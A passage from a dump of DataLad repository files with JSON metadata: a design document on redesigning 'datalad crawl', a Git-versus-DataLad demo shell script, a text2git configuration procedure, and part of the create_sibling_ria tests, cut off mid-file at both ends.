['/a'], [])\n assert_raises(ValueError, gfp, [PurePosixPath('/a')], [])\n assert_raises(ValueError, gfp, ['a'], ['/a'])\n assert_raises(ValueError, gfp, ['../a'], ['a'])" }, { "alpha_fraction": 0.7096094489097595, "alphanum_fraction": 0.7121382355690002, "avg_line_length": 33.7203254699707, "blob_id": "9b63024aff50bc3b31a5fe5d92a00fdee9922677", "content_id": "ccc2384a02bef7af6e3abc6d7ee07562a176945f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 21354, "license_type": "permissive", "max_line_length": 175, "num_lines": 615, "path": "/docs/design.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Thoughts about redesign, well actually \"design\" since originally there\nwere none, of datalad crawl.\n\nGlobal portion of the config\n============================\n\n::\n\n [dataset]\n path =\n description = \n exec = \n\nData providers\n==============\n\n`crawl` command collects data present possibly across\ndifferent remote data providers (regular HTTP websites, AWS S3\nbuckets, etc) and then consolidates access to them within a single\ngit-annex'ed repository. `crawl` should also keep track of\nstatus/versions of the files, so in case of the updates (changes,\nremovals, etc) on remote sites, git-annex repository could be\ncorrespondingly updated.\n\nCommon config specs::\n\n [provider:XXX]\n type = (web|s3http|merge|git-annex) # default to web\n branch = master # default to master\n commit_to_git = # regexps of file names to commit directly to git\n ignore = # files to ignore entirely\n drop = False # either to drop the load upon 'completion'\n # some sanity checks\n check_entries_limit = -1 # no limit by default\n\n\n(To be) Supported data providers\n--------------------------------\n\nWeb\n~~~\n\nIn many usecases data are hosted on a public portal, lab website,\npersonal page, etc. Such data are often provided in tarballs, which\nneed to be downloaded and extracted later on. Extraction will not be\na part of this provider -- only download from the web::\n\n [provider:incoming_http]\n type = web\n mode = (download|fast|relaxed) # fast/relaxed/download\n filename = (url|request) # of cause also could be _e'valuated given the bs4 link get_video_filename(link, filename)\n recurse_(a|href) = # regexes to recurse\n # mimicking scrapy\n start_urls = http://... #\n certificates = # if there are https -- we need to allow specifying those\n allowed_domains = example.com/buga/duga # to limit recursion\n sample.com\n excluded_hrefs = # do not even search for \"download\" URLs on given pages. Should also allow to be a function/callback to decide based on request?\n include_(a|href) = # what to download\n exclude_(a|href) = # and not (even if matches)\n ???generators = generate_readme # Define some additional actions to be performed....\n\nWe need to separate options for crawling (recursion etc) and deciding\nwhat to download/annex.\n\nQ: should we just specify xpath's for information to get extracted\n from a response corresponding to a matching url? just any crawled page?\n\nQ: allow to use xpath syntax for better control of what to recurse/include?\n\nQ: authentication -- we should here relate to the Hostings\n!: scrapy's Spider provides start_requests() which could be used to\n initiate the connection, e.g. to authenticate and then use that connection.\n Authentication detail must not be a part of the configuration, BUT\n it must know HOW authentication should be achieved. In many cases could\n be a regular netrc-style support (so username/password).\n\n Those authenticators should later be reused by \"download clients\"\n\nQ: we might need to worry/test virtually about every possible associated\n to http downloads scenario, e.g. support proxy (with authentication).\n May be we could just switch to aria2 and allow to specify access options?\n\nQ: may be (a new provider?) allow to use a scrapy spider's output to\n harvest the table of links which need to be fetched\n\n\n\nUse cases to keep in mind\n+++++++++++++++++++++++++\n\n- versioning present in the file names\n ftp://ftp.ncbi.nlm.nih.gov/1000genomes/ftp/sequence_indices/\n\n - ha -- idea, all those should be referred in some other branch, like\n with archives, and then 'public' one would just take care about\n pointing to the \"correct one\" and serve a \"compressed\" view.\n Hence: monitor original, point \"compressed\" to a branch giving it\n a set of rules on how to determine version, i.e. on which files\n This way we could have both referenced in the same repository.\n\n\nAmazon S3\n~~~~~~~~~\n\nInitial accent will be made on S3 buckets which have versioning\nenabled, and which expose their content via regular http/https.\n\ntricky points:\n- versioning (must be enabled. If uploaded before enabled, version is Null)\n\n- etags are md5s BUT only if upload was not multi-chunked, so\n it becomes difficult to identify files by md5sums (must be\n downloaded first then, or some meta-info of file should be modified so\n etag gets regenerated -- should result in file md5sum appearing as etag)\n\n- S3 most probably would be just an additional -- not the primary provider\n\n\nGenerated\n~~~~~~~~~\n\nWe should allow for files to be generated based on the content of the\nrepository and/or original information from the data providers,\ne.g. content of the webpages containing the files to be\ndownloaded/referenced. Originally envisioned as a separate branch,\nwhere only archived content would be downloaded and later extracted\ninto corresponding locations of the \"public\" branch (e.g. master).\n\nBut may be it should be more similar to the stated above \"versioning\"\nidea where it would simply be an alternative \"view\" of another branch,\nwhere some content is simply extracted. I.e. all those modifications\ncould be assembled as a set of \"filters\"::\n\n [generator:generate_readme]\n filename = README.txt\n content_e = generate_readme(link, filename) # those should be obtained/provided while crawling\n\nor\n\n [generator:fetch_license]\n filename = LICENSE.txt\n content_e = fetch_license(link, filename) # those should be obtained/provided while crawling\n\n\nMerge\n~~~~~\n\nOriginally fetched Files might reside in e.g. 'incoming' branch while\n'master' branch then could be 'assembled' from few other branches with\nhelp of filtering::\n\n [provider:master]\n type = merge\n branch = master # here matches the name but see below if we need to repeat\n merge = incoming_data_http\n incoming_meta_website\n filters = extract_models\n extract_data\n generate_some_more_files_if_you_like\n\n\nQ: should we may be 'git merge --no-commit' and then apply the\n filters???\n\n probably not since there could be conflicts if similarly named file\n is present in target branch (e.g. generated) and was present\n (moved/renamed via filters) in the original branch.\n\nQ: but merging of branches is way too cool and better establishes the\n 'timeline' and dependencies...\n So merge should be done \"manually\" by doing (there must be cleaner way)::\n\n git merge -s ours --no-commit\n git rm -r *\n # - collect and copy files for all the File's from branches to .\n # - stage all the files\n # - pipe those \"File\"s from all the branches through the filters\n # (those should where necessary use git rm, mv, etc)\n # - add those File's to git/git-annex\n git commit\n\n but what if a filter (e.g. cmd) requires current state of files from\n different branches?... all possible conflict problems could be\n mitigated by storing content in branches under some directories,\n then manipulating upon \"merge\" and renaming before actually 'git merging'\n\n\nQ: what about filters per incoming branch??? we could options for\n filters specification\n (e.g. extract_models[branches=incoming_data_http]) or allow\n only regular 2-edge merge at a time but multiple times...\n\n\nXNAT, COINS, ...\n~~~~~~~~~~~~~~~~\n\nLater ... but the idea should be the same I guess: they should expose\ncollections of File's with a set of URIs so they could be addurl'ed to\nthe files. It is not clear yet either they would need to be crawled\nor would provide some API similar to S3 to request all the necessary\ninformation?\n\n\ngit/git-annex\n~~~~~~~~~~~~~\n\nIf provider is already a Git(-annex) repository. Usecase:\nforrest_gump. So it is pretty much a regular remote **but** it might\nbenefit from our filters etc.\n\n\ntorrent\n~~~~~~~\n\nI guess similar/identical to archives if torrent points to a single\nfile -- so just 'addurl'. If torrent provides multiple files, would\nneed mapping of UUIDs I guess back to torrents/corresponding files.\nSo again -- similar to archives...?\n\naria2 seems to provide a single unified HTTP/HTTPS/FTP/BitTorrent\nsupport, with fancy simultaneous fetching from multiple\nremotes/feeding back to the torrent swarm (caution for non-free data).\nIt also has RPC support, which seems to be quite cool and might come\nhandy (e.g. to monitor progress etc)\n\n\nWild: Git repository for being rewritten\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ntheoretically we could collect all the information to rewrite some\nother Git repo but now injecting some files into git-annex (while\npossibly even pointing for the load to e.g. original SVN repo).\n\nTricky:\n- branches and merges -- would be really tricky and so far not\n envisioned how\n- \"updates\" should correspond to commits in original repository\n- all the commit information should be extracted/provided for the\n commit here\n\n\nFilters\n=======\n\nConsidering idea that all the modifications (archives extraction,\nversioning etc) could be made through monitoring of another branch(es)\nand applying a set of filters.\n\n- files which aren't modified, should also propagate into target\n branch, along with all their urls\n\n file by file wouldn't work since filter might need to analyze the\n entire list of files...::\n\n def apply_filters(self):\n files_out = files_in\n for filter in self.filters:\n files_out = filter.apply(files_out)\n return files_out\n\n then each filter would decide on how to treat the list of files.\n May be some filters' subtyping would be desired\n (PerfileFilter/AllfilesFilter)\n\n- filters should provide API to 'rerun' their action to obtain the\n same result.\n\n\nCross-branch\n------------\n\nSome filters to be applied on files from one branch to have results\nplaced into another:\n\n\nExtract\n~~~~~~~\n\nSpecial kind of a beast: while keeping the original archive under\ngit-annex obtained from any other provider (e.g. 'Web'), we extract\nthe load (possibly with some filtering/selection):\n\n Q: how to deal with extract from archives -- extraction should\n better be queued to extract multiple files from the archive at\n once. But ATM it would not happen since all those URIs will\n simply be requested by simple wget/curl calls by git-annex file\n at a time.\n A: upon such a first call, check if there is .../extracted_key/key/, if\n there is -- use. If not -- extract and then use. use = hardlink\n into the target file.\n Upon completion of `datalad get` (or some other command) verify\n that all `/extracted/` are removed (and/or provide setting -- may\n be we could/should just keep those around)\n\n\nConfig Examples:\n++++++++++++++++\n\n::\n\n [filter:extract_models]\n filter = extract # by default would be taken as the element after \"filter:\"\n input = *(\\S+)_models\\.tgz$ # and those files are not provided into output\n output_prefix = models/$1/ # somehow we should allow to reuse input regex's groups\n exclude = # regex for files to be excluded from extraction or straight for tar?\n strip_path = 1\n\nProbably will just use patoolib (do not remember if has\nstrip_path... seems not:\nhttps://bugs.debian.org/cgi-bin/bugreport.cgi?bug=757483)\n\nURI: dl:extract:UID\n\nand we keep information for what 'key' it came into what file (which\nmight later get renamed, so extraction from the archive shouldn't\nlater happen in-place, but rather outside and then moved accordingly)\n\nTricky point(s):\n\n- may be by default should still extract all known archives types and\n just rely on the filename logic?\n- the same file might be available from multiple archives.\n So we would need to keep track from previous updates, from which\n archive files could be fetched.\n - how to remove if archive is no longer avail?\n probably some fsck should take care about checking if archives\n are still avail, and if not -- remove the url\n\n- keep track which files came from the archive, so we could later\n remove them happen if archive misses the file now.\n\nQ: allow for 'relaxed' handling?\n If tarballs are not versioned at all, but we would like to create\n overall (? or just per files) 'relaxed' git-annex?\n\n Probably no complication if URIs will be based (natively) on the\n fast or relaxed keys. Sure thing things would fail if archive was\n changed and lacks the file.\n\nQ: hm -- what about MD5SUM checking? e.g. if archive was posted with\n the MD5SUMs file\n\n I guess some kind of additional filter which could be attached\n somehow?\n\n\nMove/Rename/Delete\n~~~~~~~~~~~~~~~~~~\n\nJust move/rename/delete some files around e.g. for a custom view of\nthe dataset (e.g. to conform to OpenfMRI layout). Key would simply be\nreused ;)\n\nQ: should it be 'Within-branch' filter?\n\n\nCommand\n~~~~~~~\n\nA universal filter which would operate on some files and output\npossibly in place or modified ones...\n\nThen it would need to harvest and encode into file's URI the\nprovenance -- i.e. so it could later be recreated automagically.\n\nFor simple usecases (e.g. creation of lateralized atlas in HOX, some\ndata curation, etc)\n\nURI: dl:cmd:UID\n\nwhile we keep a file providing the corresponding command for each UID,\nwhere ARGUMENTS will would point to the original files keys in the git\nannex. Should it be kept in PROV format may be???\n\nConfig Examples::\n\n [filter:command_gunzip]\n in1 = *\\.gz\n in2_e = in1.replace('.gz', '')\n #eval_order=in1 in2\n command = zcat {in1} > {in2}\n output_files = {in2}\n\nProblems:\n\n- might be tricky to provide generic enough interface?\n- we need plentiful of use-cases to get it right, so this one is just\n to keep in mind for future -- might be quite cool after all.\n\n\nWithin-branch\n-------------\n\nOther \"Filters\" should operate within the branch, primarily simply for\nchecking the content\n\n\nChecksum\n~~~~~~~~\n\ne.g. point to MD5SUMS file stored in the branch, provide how file\nnames must be augmented, run verification -- no files output, just the\nstatus\n\nAddurl\n~~~~~~\n\nIf the repository is going/was published also online under some URL.\nWe might like to populate files with corresponding urls.\n\n [filter:addurl]\n prefix = http://psydata.ovgu.de/forrest_gump/.git/annex/\n check = (False|True) # to verify presence or not ???\n\nUsecase -- Michael's forrest_gump repository. Now files are not\nassociated explicitly with that URL -- only via a regular git remote.\nThis cumbersomes work with clones which then all must have original\nrepository added as a remote.\n\n`check = False` could be the one needed for a 'publish' operation\nwhere this data present locally is not yet published anywhere.\n\nTagging\n~~~~~~~\n\nWe might like to tag files... TODO: think what to provide/use to\ndevelop nice tags.\n\nIdeas:\n\n- a tag given a set of filename regexps\n\n [tag:anatomicals]\n files = .*\\_anat\\.nii\\.gz\n tag = modality=anatomy\n\n or just\n\n [tag:anatomicals]\n files = .*\\_anat\\.nii\\.gz\n tag = anatomy\n\n if it is just a tag (anatomy) without a field\n\n - (full)filename regexp with groups defining possibly multiple\n tag/value pairs\n\n [tag:modality]\n files = .*\\_(?P<modality>\\S*)\\.nii\\.gz\n translate = anat: T1 # might need some translation dictionary?\n dwi: DTI\n\n\nNotes:\n- metadata cane be added only to files under git-annex control so those\n directly committed\n\nDesign thoughts\n===============\n\nData providers should provide a unified interface\n\nDataProvider\n~~~~~~~~~~~~\n\nCommon Parameters\n- add_to_git - what files to commit to git directly (should we leverage\n git-annex largefiles option somehow?)\n- ignore - what files to ignore\n\n- get_items(version=None) - return a list of Files\n- get_item_by_name\n- get_item_by_md5\n - should those be additional interfaces?\n - what if multiple items fulfill (content is the same, e.g. empty, names differ,\n we better get the most appropriate in the name or don't give a damn?)\n - what if a collision????\n- get_item_by_sha256\n - e.g. natively provided by 'Branch' provider for annexed files\n (what to do about git committed ones -- compute/keep info?)\n- get_versions(min_version=None)\n provider-wide version (i.e. not per file). E.g. S3\n provider can have multiple versions of files.\n Might be that it needs to return a DAG of versions i.e. a\n (version, [prev_version1, prev_version2, ...]) to represent e.g.\n history of a Git repo. In most of the cases would be degenerate to just\n one prev version, in which case could just be (version, ).\n We would need to store that meta-information for future updates at least\n for the last version so we could 'grow' next ones on top.\n- ? get_release_versions() -- by default identical to above... but might\n differ (update was, but no new official release (yet), so no release\n tag)\n- get_version_metainformation() -- primarily conceived when thinking\n about monitoring other VCS repos... so should be information to be\n used for a new Git commit into this new repository\n\n.. note:\n\n Keep in mind\n - Web DataProvider must have an option to request the content filename\n (addressing use case with redirects etc)\n - Some providers might have multiple URIs (mirrors) so right away\n assign them per each file... As such they might be from\n different Hostings!\n\n\nFile\n~~~~\n\nwhat would be saved as a file. Should know about itself... and origins!\n\n- filename\n- URIs - list containing origins (e.g. URLs) on where to fetch it from.\n First provided by the\n original DataProvider, but then might be expanded using\n other DataProviders\n Q: Those might need to be not just URIs but some classes associated\n with original Hosting's, e.g. for the cases of authentication etc?\n or we would associate with a Hosting based on the URI?\n # combination of known fields should be stored/used to detect changes\n # Different data providers might rely on a different subset of below\n # to see if there was a change. We should probably assume some\n # \"correspondence\"\n- key # was thinking about Branch as DataProvider -- those must be reused\n- md5\n- sha256\n- mtime\n- size\n\nIt will be the job of a DataProvider to initiate File with the\nappropriate filename.\n\nURI\n~~~\n\n-> URL(URI): will be our first and main \"target\" but it could\n also be direct S3, etc.\n\na URI should be associated with an \"Hosting\" (many-to-one), so we could\ne.g. provide authentication information per actual \"Hosting\" as the\nentity. But now we are getting back to DataProvider, which is the\nHosting, or actually also a part of it (since Hosting could serve\nmultiple Providers, e.g. OpenfMRI -> providers per each dataset?)\nBut also Provider might use/point to multiple Hostings (e.g. mirrors\nlisted on nitp-2013).\n\nHosting\n~~~~~~~\n\nEach DataProvider would be a factory of File's.\n\n\nIdeas to not forget\n~~~~~~~~~~~~~~~~~~~\n\n- Before carrying out some operation, remember the state of all\n (involved) branches, so it would be very easy later on to \"cancel\"\n the entire transaction through a set of 'git reset --hard' or\n 'update-ref's.\n\n Keep log of the above!\n\n- multiple data providers could be specified but there should be\n 'primary' and 'complimentary' ones:\n\n - primary provider(s) define the layout/content\n - complimentary providers just provide references to additional\n locations where that data (uniquely identified via checksums etc)\n could be obtained, so we could add more data providing urls\n - Q: should all DataProvider's be able to serve as primary and complimentary?\n - most probably we should allow for an option to 'fail' or issue a\n warning in some cases\n - secondary provider doesn't carry a requested load/file\n - secondary provider provides some files not provided by the primary\n data provider\n\n- at the end of the crawl operation, verify that all the files have all\n and only urls from the provided data providers\n\n- allow to add/specify conventional git/annex clones as additional,\n conventional (non special) remotes to be added.\n\n- allow to prepopulate URLs given e.g. perspective hosting on HTTP.\n This way whenever content gets published there -- all files would\n have appropriate URLs associated and would 'transcend' through the\n clones without requiring adding original remote.\n\nUpdates\n=======\n\n- must track updates and removals of the files\n- must verify presence (add, remove) of the urls associated with the\n files given a list of data providers\n\n\nMeta information\n================\n\nSince a while `git annex` provides a neat feature allowing to assign\ntags to the files and later use e.g. `git annex view` to quickly\ngenerate customized views of the repository.\n\n\nSome cool related tools\n=======================\n\nhttps://github.com/scrapy/scrapely\n Pure Python (no DOM, lxml, etc) scraping of pages, \"training\" the\n scraper given a sample. May be could be handy???\nhttps://github.com/scrapy/slybot\n Brings together scrapy + scrapely to provide json-specs for\n spiders/items/etc\n Might be worth at least adopting spiders specs...?\n Has a neat slybot/validation/schemas.json which validates the schematic \n" }, { "alpha_fraction": 0.7240251898765564, "alphanum_fraction": 0.7242587208747864, "avg_line_length": 38.2935791015625, "blob_id": "29092aec3b1055cf7b1eb928028f6c096f72c0f0", "content_id": "a9e91269f4f4cc42a8d153873312bdbfa015b300", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4283, "license_type": "permissive", "max_line_length": 187, "num_lines": 109, "path": "/docs/casts/datalad_convenience_vs_git.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"Fast forward through some prior work...\"\n\nsay \"Let's assume a student developed an algorithm, using Git.\"\nrun \"mkdir code; cd code; git init; touch work; git add work ; git commit -m 'MSc thesis by student A done'; cd ..\"\n\nsay \"An another student collected some data, tracked with Git-annex.\"\nrun \"mkdir data; cd data; git init; git annex init; echo 'DATA!' > work; git annex add work ; git commit -m 'Data collection by student B done'; cd ..\"\n\nsay \"A postdoc performed an analysis with the new algorithm on that data, results tracked with Git-annex.\"\n\nrun \"mkdir analysis; cd analysis; git init && git annex init\"\n\nsay \"Git submodules are perfect for versioned tracking of dependencies, code or data.\"\nrun \"git submodule add ../code\"\nrun \"git submodule add ../data\"\nrun \"git -C data annex init\"\nrun \"git commit -m 'Add dependencies'\"\n\nrun \"touch work; git add work && git commit -m 'Analysis by postdoc done'; cd ..\"\n\nsay \"This happened in the past... Now the students left and the postdocs is on vacation. Time for the PI to write up the paper...\"\n\nsay \"The paper is nothing but a new project that depends on the analysis of the study it will describe.\"\nrun \"mkdir paper\"\nrun \"cd paper\"\nrun \"git init\"\nrun \"git submodule add ../analysis study\"\nsay \"Need to remember what the postdoc said: If a repo uses git-annex, need to init it. Does it?\"\nrun \"git -C study branch -a | grep git-annex\"\nsay \"Ok, seems to be\"\nrun \"git -C study annex init\"\nrun \"git commit -m 'Add analysis'\"\n\nsay \"Let Git assemble the entire working tree\"\nrun \"git submodule update --init --recursive\"\n\nsay \"Arrgh, there is a bug in the code, and the postdoc isn't here to work the fix in. But hey, Git is all distributed -- let's apply it right here, so we can move on with the science...\"\nrun \"echo 'fix' >> study/code/work\"\n\nsay \"Quickly commit the fix, so it can be pushed upstream later...\"\nrun \"git add study/code/work\"\n\nsay \"Erm... Needs to happen in the repository that actually contains the file...Need to look up the boundaries...\"\nrun \"git diff --submodule=diff\"\n\nsay \"Ok, let's do this...\"\nrun \"cd study/code\"\nrun \"git add work && git commit -m 'Fix'\"\n\nsay \"Damn, detached HEAD. Need to fix, or it will be difficult to push.\"\nrun \"git reset HEAD~1\"\nrun \"git checkout master\"\nrun \"git add work && git commit -m 'Fix'\"\n\nsay \"Still have to commit all the way up...one sec...\"\nrun \"cd ..\"\nrun \"git add code && git commit -m 'Fix'\"\nrun \"cd ..\"\nrun \"git add study && git commit -m 'Fix'\"\n\nsay \"All fixed and committed, ready to start. Hopefully, there are no more bugs...\"\n\nsay \"Just need to have one quick look at the data. Git-annex will obtain it in no time...\"\nrun \"git annex get study/data/work\"\n\nsay \"Ah, right. Also needs to be done in the repository that actually has the file. I still remember the boundaries...Gotta keep them in mind.\"\nrun \"git -C study/data annex get work\"\n\nsay \"Good! Now back to writing!\"\n\n\nsay \"So far the story with Git/Git-annex. Let's see how the exact same looks with DataLad...\"\nsay \"But first clean up...\"\nrun \"cd ..\"\nrun \"rm -rf paper\"\n\nsay \"Git-annex protects the files it manages. First a user needs to give enough permissions.\"\nrun \"chmod -R u+rwx paper\"\nrun \"rm -rf paper\"\n\nsay \"Now DataLad. We can use the identical repositories for the prior student and postdoc work. DataLad does not require that everyone uses DataLad.\"\nrun \"datalad create --no-annex paper\"\nrun \"cd paper\"\n\nsay \"Cloning a dataset INTO a specified (super)dataset makes it a subdataset.\"\nrun \"datalad clone --dataset . ../analysis study\"\nsay \"Requesting a particular file automatically obtains all needed subdatasets\"\nrun \"datalad get study/code/work\"\n\nsay \"Apply the code fix, and have it be detected\"\nrun \"echo 'fix' >> study/code/work\"\nrun \"datalad status\"\n\nsay \"Unlike Git, DataLad makes nested datasets feel like a monorepo\"\nrun \"datalad status --recursive\"\n\nsay \"Not just for reporting, but also for modification\"\nrun \"datalad save --dataset . -m 'Fix' study/code/work\"\nrun \"datalad status\"\n\nsay \"All modifications are committed up to a specified superdataset\".\n\nsay \"Requesting an annex'ed files is no different from any other file\"\nrun \"datalad get study/data/work\"\nrun \"cat study/data/work\"\n\nsay \"When done, just remove\"\nrun \"cd ..\"\nrun \"datalad remove --dataset paper --recursive\"\n" }, { "alpha_fraction": 0.6869918704032898, "alphanum_fraction": 0.6910569071769714, "avg_line_length": 27.384614944458008, "blob_id": "6e6f0f576fc658ebd60b43182a8a3acd77826967", "content_id": "0563af1ef8daadd4ae38810125fdd8e5b1411784", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "permissive", "max_line_length": 72, "num_lines": 26, "path": "/datalad/resources/procedures/cfg_text2git.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Procedure to configure Git annex to add text files directly to Git\"\"\"\n\nimport sys\nimport os.path as op\n\nfrom datalad.distribution.dataset import require_dataset\n\nds = require_dataset(\n sys.argv[1],\n check_installed=True,\n purpose='configuration')\n\nannex_largefiles = '((mimeencoding=binary)and(largerthan=0))'\nattrs = ds.repo.get_gitattributes('*')\nif not attrs.get('*', {}).get(\n 'annex.largefiles', None) == annex_largefiles:\n ds.repo.set_gitattributes([\n ('*', {'annex.largefiles': annex_largefiles})])\n\ngit_attributes_file = op.join(ds.path, '.gitattributes')\nds.save(\n git_attributes_file,\n message=\"Instruct annex to add text files to Git\",\n result_renderer='disabled'\n)\n" }, { "alpha_fraction": 0.5748191475868225, "alphanum_fraction": 0.5807018876075745, "avg_line_length": 36.92051315307617, "blob_id": "02183d60e439377041fdb014d75db254b9cc2b67", "content_id": "d541295c10bcf75813a547fdfbff117a1e6e1c86", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14789, "license_type": "permissive", "max_line_length": 99, "num_lines": 390, "path": "/datalad/distributed/tests/test_create_sibling_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport os.path as op\nfrom functools import wraps\nfrom unittest.mock import patch\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n attr,\n chpwd,\n eq_,\n known_failure_githubci_win,\n ok_exists,\n skip_if_on_windows,\n skip_ssh,\n skip_wo_symlink_capability,\n slow,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\n\ndef with_store_insteadof(func):\n \"\"\"decorator to set a (user-) config and clean up afterwards\"\"\"\n\n @wraps(func)\n @attr('with_config')\n def _wrap_with_store_insteadof(*args, **kwargs):\n host = args[0]\n base_path = args[1]\n try:\n dl_cfg.set('url.ria+{prot}://{host}{path}.insteadOf'\n ''.format(prot='ssh' if host else 'file',\n host=host if host else '',\n path=base_path),\n 'ria+ssh://test-store:', scope='global', reload=True)\n return func(*args, **kwargs)\n finally:\n dl_cfg.unset('url.ria+{prot}://{host}{path}.insteadOf'\n ''.format(prot='ssh' if host else 'file',\n host=host if host else '',\n path=base_path),\n scope='global', reload=True)\n return _wrap_with_store_insteadof\n\n\n@with_tempfile\ndef test_invalid_calls(path=None):\n\n ds = Dataset(path).create()\n\n # no argument:\n assert_raises(TypeError, ds.create_sibling_ria)\n\n # same name for git- and special remote:\n assert_raises(ValueError, ds.create_sibling_ria, 'ria+file:///some/where',\n name='some', storage_name='some')\n\n # missing ria+ URL prefix\n assert_result_count(\n ds.create_sibling_ria(\n 'file:///some/where', name='some', on_failure='ignore'),\n 1,\n status='error',\n )\n\n\n@skip_if_on_windows # running into short path issues; same as gh-4131\n@with_tempfile\n@with_store_insteadof\n@with_tree({'ds': {'file1.txt': 'some'},\n 'sub': {'other.txt': 'other'},\n 'sub2': {'evenmore.txt': 'more'}})\n@with_tempfile(mkdir=True)\ndef _test_create_store(host, base_path=None, ds_path=None, clone_path=None):\n\n ds = Dataset(ds_path).create(force=True)\n\n subds = ds.create('sub', force=True)\n subds2 = ds.create('sub2', force=True, annex=False)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n # don't specify special remote. By default should be git-remote + \"-storage\"\n res = ds.create_sibling_ria(\"ria+ssh://test-store:\", \"datastore\",\n post_update_hook=True, new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n # remotes exist, but only in super\n siblings = ds.siblings(result_renderer='disabled')\n eq_({'datastore', 'datastore-storage', 'here'},\n {s['name'] for s in siblings})\n sub_siblings = subds.siblings(result_renderer='disabled')\n eq_({'here'}, {s['name'] for s in sub_siblings})\n sub2_siblings = subds2.siblings(result_renderer='disabled')\n eq_({'here'}, {s['name'] for s in sub2_siblings})\n\n # check bare repo:\n git_dir = Path(base_path) / ds.id[:3] / ds.id[3:]\n\n # The post-update hook was enabled.\n ok_exists(git_dir / \"hooks\" / \"post-update\")\n # And create_sibling_ria took care of an initial call to\n # git-update-server-info.\n ok_exists(git_dir / \"info\" / \"refs\")\n\n git_config = git_dir / 'config'\n ok_exists(git_config)\n content = git_config.read_text()\n assert_in(\"[datalad \\\"ora-remote\\\"]\", content)\n super_uuid = ds.config.get(\"remote.{}.annex-uuid\".format('datastore-storage'))\n assert_in(\"uuid = {}\".format(super_uuid), content)\n\n # implicit test of success by ria-installing from store:\n ds.push(to=\"datastore\")\n with chpwd(clone_path):\n if host:\n # note, we are not using the \"test-store\"-label here\n clone('ria+ssh://{}{}#{}'.format(host, base_path, ds.id),\n path='test_install')\n else:\n # TODO: Whenever ria+file supports special remote config (label),\n # change here:\n clone('ria+file://{}#{}'.format(base_path, ds.id),\n path='test_install')\n installed_ds = Dataset(op.join(clone_path, 'test_install'))\n assert installed_ds.is_installed()\n assert_repo_status(installed_ds.repo)\n eq_(installed_ds.id, ds.id)\n # Note: get_annexed_files() always reports POSIX paths.\n assert_in('ds/file1.txt',\n installed_ds.repo.get_annexed_files())\n assert_result_count(installed_ds.get(op.join('ds', 'file1.txt')),\n 1,\n status='ok',\n action='get',\n path=op.join(installed_ds.path, 'ds', 'file1.txt'))\n # repeat the call to ensure it doesn't crash (see #6950)\n res = ds.create_sibling_ria(\"ria+ssh://test-store:\", \"datastore\", on_failure='ignore')\n assert_result_count(res, 1, status='error', action='create-sibling-ria', message=(\n \"a sibling %r is already configured in dataset %r\",\n 'datastore', ds.path))\n\n # now, again but recursive.\n res = ds.create_sibling_ria(\"ria+ssh://test-store:\", \"datastore\",\n recursive=True, existing='reconfigure',\n new_store_ok=True)\n assert_result_count(res, 1, path=str(ds.pathobj), status='ok', action=\"create-sibling-ria\")\n assert_result_count(res, 1, path=str(subds.pathobj), status='ok', action=\"create-sibling-ria\")\n assert_result_count(res, 1, path=str(subds2.pathobj), status='ok', action=\"create-sibling-ria\")\n\n # remotes now exist in super and sub\n siblings = ds.siblings(result_renderer='disabled')\n eq_({'datastore', 'datastore-storage', 'here'},\n {s['name'] for s in siblings})\n sub_siblings = subds.siblings(result_renderer='disabled')\n eq_({'datastore', 'datastore-storage', 'here'},\n {s['name'] for s in sub_siblings})\n # but no special remote in plain git subdataset:\n sub2_siblings = subds2.siblings(result_renderer='disabled')\n eq_({'datastore', 'here'},\n {s['name'] for s in sub2_siblings})\n\n # for testing trust_level parameter, redo for each label:\n for trust in ['trust', 'semitrust', 'untrust']:\n ds.create_sibling_ria(\"ria+ssh://test-store:\",\n \"datastore\",\n existing='reconfigure',\n trust_level=trust,\n new_store_ok=True)\n res = ds.repo.repo_info()\n assert_in('[datastore-storage]',\n [r['description']\n for r in res['{}ed repositories'.format(trust)]])\n\n\n@slow # 11 + 42 sec on travis\ndef test_create_simple():\n\n _test_create_store(None)\n # TODO: Skipped due to gh-4436\n skip_if_on_windows(skip_ssh(_test_create_store))('datalad-test')\n\n\n@skip_ssh\n@skip_if_on_windows # ORA remote is incompatible with windows clients\n@with_tempfile\n@with_tree({'ds': {'file1.txt': 'some'},\n 'sub': {'other.txt': 'other'},\n 'sub2': {'evenmore.txt': 'more'}})\n@with_tempfile\ndef test_create_push_url(detection_path=None, ds_path=None, store_path=None):\n\n store_path = Path(store_path)\n ds_path = Path(ds_path)\n detection_path = Path(detection_path)\n\n ds = Dataset(ds_path).create(force=True)\n ds.save()\n\n # patch SSHConnection to signal it was used:\n from datalad.support.sshconnector import SSHManager\n def detector(f, d):\n @wraps(f)\n def _wrapper(*args, **kwargs):\n d.touch()\n return f(*args, **kwargs)\n return _wrapper\n\n url = \"ria+{}\".format(store_path.as_uri())\n push_url = 